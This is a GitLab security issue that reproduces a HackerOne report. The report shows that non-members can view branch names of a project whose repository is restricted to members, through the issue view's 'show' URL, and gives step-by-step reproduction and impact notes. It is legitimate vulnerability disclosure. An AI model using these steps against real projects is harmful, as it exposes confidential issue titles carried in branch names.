Leaking branch names of projects with confidential (private) Repository

⚠️ Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #3214025 by weasterhacker on 2025-06-22, assigned to @katwu:

Report | Attachments | How To Reproduce

Report

Hi team,

this isssue similar to past gitlab issues -of disclosure of branch names of private (confidential repostory )

here list past branch names disclosure issue beacause - it helps to traige this issue fast

#480509 (closed) (leak branch names of confidential repository)

#508046 (closed) (Unauthorized access to reading branch names when Repository and all its assets are disabled in the project)

#406844 (closed) (Ambiguous branch name exploitation )

now this is clear that disclosing branch names of confidential (private Repository) is valid security issue .

Here attacker (non member) view branch names of confidential repository of public projects

Steps to reproduce

As Owner

Create a project with the repository visibility set to Only Project Members

go to Settings > General > Visibility, project features, permissions > Repository and set it to Only Project Members

victim create a issue at victim project

victim navigate created issue >there is an option come for creating merge request >first it create branch > then it create merge request

finish creating merge request successfully >merge request created successfully

As Attacker-

directly navigate victim project branches - https://gitlab.com/groupm11/fuxxing/-/branches

Getting 404: Page not found (because repository set to be "only project members" confidential

now attacker navigate victim project issue page - https://gitlab.com/groupm11/fuxxing/-/issues?show=eyJpaWQiOiI1IiwiZnVsbF9wYXRoIjoiZ3JvdXBtMTEvZnV4eGluZyIsImlkIjoxNjkyNTU3NjV9

(for poc purpose you can also see branch names of my project confidential repository )

naviate - https://gitlab.com/groupm11/fuxxing/-/issues?show=eyJpaWQiOiI1IiwiZnVsbF9wYXRoIjoiZ3JvdXBtMTEvZnV4eGluZyIsImlkIjoxNjkyNTU3NjV9

or go step by step - https://gitlab.com/groupm11/fuxxing/-/issues

Now you will see the branch names of confidential repository

Output of checks
This bug happens on GitLab.com

video poc -

bandicam_2025-06-22_09-56-22-533.mp4

Impact

Impact-

Branch names can contain sensitive information, especially when the default branch name template of all projects is %{id}-%{title}, therefore branches that address issues contain the title of the issues themself, which can be sensitive a lot of the time.
An example where the impact could be critical is gitlab-org/security/gitlab, as it has security-${title} as its branch name template (Luckily the project is private, so it's not vulnerable).

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

• bandicam_2025-06-22_09-56-22-533.mp4

How To Reproduce

Please add reproducibility information to this section: